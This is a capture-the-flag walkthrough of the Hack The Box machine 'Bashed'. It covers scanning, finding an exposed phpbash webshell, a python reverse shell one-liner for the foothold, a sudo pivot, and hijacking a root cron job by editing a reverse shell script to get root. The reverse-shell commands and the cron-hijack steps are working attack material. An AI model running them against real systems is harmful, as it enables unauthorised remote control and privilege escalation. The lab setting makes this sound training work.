Bashed

Port Checking

naabu -host bashed.htb -v

                  __
  ___  ___  ___ _/ /  __ __
 / _ \/ _ \/ _ \/ _ \/ // /
/_//_/\_,_/\_,_/_.__/\_,_/ v2.0.5

		projectdiscovery.io

Use with caution. You are responsible for your actions
Developers assume no liability and are not responsible for any misuse or damage.
[INF] Running CONNECT scan with non root privileges
[DBG] Using host 10.10.10.68 for enumeration
[INF] Found 1 ports on host bashed.htb (10.10.10.68)
bashed.htb:80

Open ports:

• port 80 web

Visiting the webpage present us with phpbash software , after some googling and poking around it is found that phpbash is a webshell so , the dev might left it somewhere on the website to allow us to execute RCE ?

Directory Fuzzing

dirb http://bashed.htb

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Aug 24 05:37:07 2023
URL_BASE: http://bashed.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://bashed.htb/ ----
==> DIRECTORY: http://bashed.htb/css/                                                                                                                                      
==> DIRECTORY: http://bashed.htb/dev/                                                                                                                                      
==> DIRECTORY: http://bashed.htb/fonts/                                                                                                                                    
==> DIRECTORY: http://bashed.htb/images/                                                                                                                                   
+ http://bashed.htb/index.html (CODE:200|SIZE:7743)                                                                                                                        
==> DIRECTORY: http://bashed.htb/js/                                                                                                                                       
==> DIRECTORY: http://bashed.htb/php/                                                                                                                                      
+ http://bashed.htb/server-status (CODE:403|SIZE:298)                                                                                                                      
==> DIRECTORY: http://bashed.htb/uploads/ 

/dev seems sus , visiting the webpage show us two php files

phpbash.php
phpbash.min.php

Foothold

Multiple reverse shells attempt have been made but this works

export RHOST="YOUR_IP";export RPORT=4567;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'

Get Stable Shell

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
press CTRL + Z (go background in linux)
stty raw -echo;fg (get shell and return to session)
press ENTER to get shell

Checks

id
sudo -l

Matching Defaults entries for www-data on bashed:
   env_reset, mail_badpass,
  secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
   (scriptmanager : scriptmanager) NOPASSWD: ALL

Priv Esc

Cool , user scriptmanager can run anything

sudo -u scriptmanager /bin/bash

config.php

cat config.php 
<?php

//SITE GLOBAL CONFIGURATION
$email = "yourmail@here.com";   //<-- Your email

?>

• No creds found sadly

/scripts was found on root directory

drwxrwxr--   2 scriptmanager scriptmanager  4096 Aug 23 08:29 scripts

Contents of the folder

-rw-r--r-- 1 scriptmanager scriptmanager 218 Aug 23 08:29 test.py
-rw-r--r-- 1 root          root           12 Aug 23 08:29 test.txt

• First glance looks like the file auto run and output to test.txt ?

Content of test.py

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.10.16.4",1234));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);

• File content is literally a reverse shell

Change to ip to ours and open listener

nano test.py 

s.connect(("YOUR_IP",1234));os.dup2(s.fileno(),0);

Wait a while and walaa

nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.x.x] from (UNKNOWN) [10.10.10.68] 38206
/bin/sh: 0: can't access tty; job control turned off
# whoami
root

crontab

crontab -l
* * * * * cd /scripts; for f in *.py; do python "$f"; done

• Crontab confirms that there is root cron that run all .py file in /scripts